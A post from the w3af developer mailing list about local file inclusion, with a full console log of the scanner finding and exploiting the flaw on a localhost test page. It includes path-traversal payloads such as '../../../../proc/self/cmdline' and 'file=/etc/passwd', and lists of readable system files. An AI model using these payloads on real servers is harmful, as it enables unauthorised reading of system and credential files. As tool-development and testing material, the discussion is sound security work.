!! a web application, the vulnerability was the classic
!! index.php?filename=/etc/passwd that let's you read the content of any
!! attack.localFileReader: basically you only have one command, "cat",
!! which allows you to print the content of a file using a local file
Andres,
unless I missed something in your description, you found a local file
include vulnerabilitiy (which may be just a information leakage also,
but that doesn't matter here:) and then you use "cat" which requires
a command injection vulnerability.
Could you please explain how that works?
!! Can you think about other interesting techniques that can be
!! applied to this vulnerability in order to gain more information about
!! the target server? Thanks for your input!
index.cgi?filename=../../../../../../../../proc/self/cmdline
this works always if the vulnerability is there (missing data validation)
and the web server is not jailed.
It also works on some common *nix (all Linux, some Solaris, ...) and
gives your all interesting data where to search further.
{-: Achimw3af>>> plugins
w3af/plugins>>> audit localFileInclude
w3af/plugins>>> output console,textFile
w3af/plugins>>> output config textFile
w3af/plugins/output/config:textFile>>> set fileName output-w3af.txt
w3af/plugins/output/config:textFile>>> set verbose True
w3af/plugins/output/config:textFile>>> back
w3af/plugins>>> discovery webSpider
w3af/plugins>>> discovery config webSpider
w3af/plugins/discovery/config:webSpider>>> set onlyForward True
w3af/plugins/discovery/config:webSpider>>> back
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target
http://localhost/w3af/audit/local_file_inclusion/index.html
w3af/config:target>>> back
w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
New URL found by webSpider plugin:
http://localhost/w3af/audit/local_file_inclusion/false_positive.php
New URL found by webSpider plugin:
http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php
New URL found by webSpider plugin:
http://localhost/w3af/audit/local_file_inclusion/lfi_2.php
New URL found by webSpider plugin:
http://localhost/w3af/audit/local_file_inclusion/lfi_1.php
New URL found by webSpider plugin:
http://localhost/w3af/audit/local_file_inclusion/
Found 6 URLs and 6 different points of injection.
The list of URLs is:
- http://localhost/w3af/audit/local_file_inclusion/false_positive.php
- http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php
- http://localhost/w3af/audit/local_file_inclusion/lfi_2.php
- http://localhost/w3af/audit/local_file_inclusion/lfi_1.php
- http://localhost/w3af/audit/local_file_inclusion/
- http://localhost/w3af/audit/local_file_inclusion/index.html
The list of fuzzable requests is:
- http://localhost/w3af/audit/local_file_inclusion/index.html | Method: GET
- http://localhost/w3af/audit/local_file_inclusion/false_positive.php | Method:
GET | Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php | Method:
GET | Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/lfi_2.php | Method: GET |
Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/lfi_1.php | Method: GET |
Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/ | Method: GET
Starting localFileInclude plugin execution.
File fragments have been found. The following is a list of file fragments that
were returned by the web application while testing for local file inclusion:
- "root:x:0:0:"
- "daemon:x:1:1:"
- ":/bin/bash"
- ":/bin/sh"
". This is just an informational message, which might be related to a
vulnerability and was found on response with id 74.
Local File Inclusion was found at:
"http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php";, using HTTP
method GET. The sent data was: "file=%2Fetc%2Fpasswd". The vulnerability was
found in the request with id 74.
Finished scanning process.
w3af>>> exploit
w3af/exploit>>> exploit localFileReader
localFileReader exploit plugin is starting.
The vulnerability was found using method GET, but POST is being used during
this exploit.
Vulnerability successfully exploited. This is a list of available shells and
proxies:
- [0] <shell object (rsystem: "linux")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "endInteraction" to get out of the remote shell.Commands typed in this
menu will be runned on the remote web server.
w3af/exploit/localFileReader-0>>> list
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/crontab
/etc/environment
/etc/fstab
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/motd
/etc/passwd
/etc/shadow Permission denied.
/etc/sudoers Permission denied.
/root/.bash_history Permission denied.
w3af/exploit/localFileReader-0>>> list -r 1
/bin/bash
/bin/false
/bin/sh
/bin/sync
/etc/apache2/envvars
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/bash_completion
/etc/crontab
/etc/default/apache2
/etc/default/rcS
/etc/environment
/etc/fstab
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/motd
/etc/passwd
/lib/lsb/init-functions
/usr/bin/python
/usr/bin/sudo
/usr/lib/command-not-found
/usr/sbin/anacron
/usr/sbin/apache2
/usr/sbin/apache2ctl
/usr/sbin/htcacheclean
/usr/sbin/nologin
/dev/scd0 Permission denied.
/dev/sda1 Permission denied.
/dev/sda5 Permission denied.
/etc/shadow Permission denied.
/etc/sudoers Permission denied.
/root/.bash_history Permission denied.
/var/lib/gdm Permission denied.
/var/lib/tor Permission denied.
w3af/exploit/localFileReader-0>>> list -r 2
/bin/bash
/bin/dash
/bin/echo
/bin/false
/bin/pidof
/bin/sh
/bin/sync
/etc/apache2/envvars
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/bash_completion
/etc/crontab
/etc/debian_version
/etc/default/apache2
/etc/default/rcS
/etc/environment
/etc/fstab
/etc/group
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/lsb-base-logging.sh
/etc/motd
/etc/network/interfaces
/etc/passwd
/etc/shells
/etc/ssh/ssh_config
/etc/ssl/openssl.cnf
/lib/ld-linux.so.2
/lib/lsb/init-functions
/proc/filesystems
/sbin/lsmod
/sbin/modinfo
/sbin/start-stop-daemon
/usr/bin/expr
/usr/bin/python
/usr/bin/sudo
/usr/bin/tput
/usr/bin/vi
/usr/lib/command-not-found
/usr/lib/sudo/sudo_noexec.so
/usr/sbin/anacron
/usr/sbin/apache2
/usr/sbin/apache2ctl
/usr/sbin/htcacheclean
/usr/sbin/nologin
/usr/share/dict/words
/var/lib/dpkg/status
/var/run/apache2.pid
/dev/scd0 Permission denied.
/dev/sda1 Permission denied.
/dev/sda5 Permission denied.
/etc/shadow Permission denied.
/etc/sudoers Permission denied.
/etc/wvdial.conf Permission denied.
/root/.bash_history Permission denied.
/var/lib/gdm Permission denied.
/var/lib/tor Permission denied.
w3af/exploit/localFileReader-0>>> endInteraction
w3af/exploit>>> exit
w3af/exploit>>>
------------------------------------------------------------------------------
_______________________________________________
W3af-develop mailing list
W3af-develop@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/w3af-develop
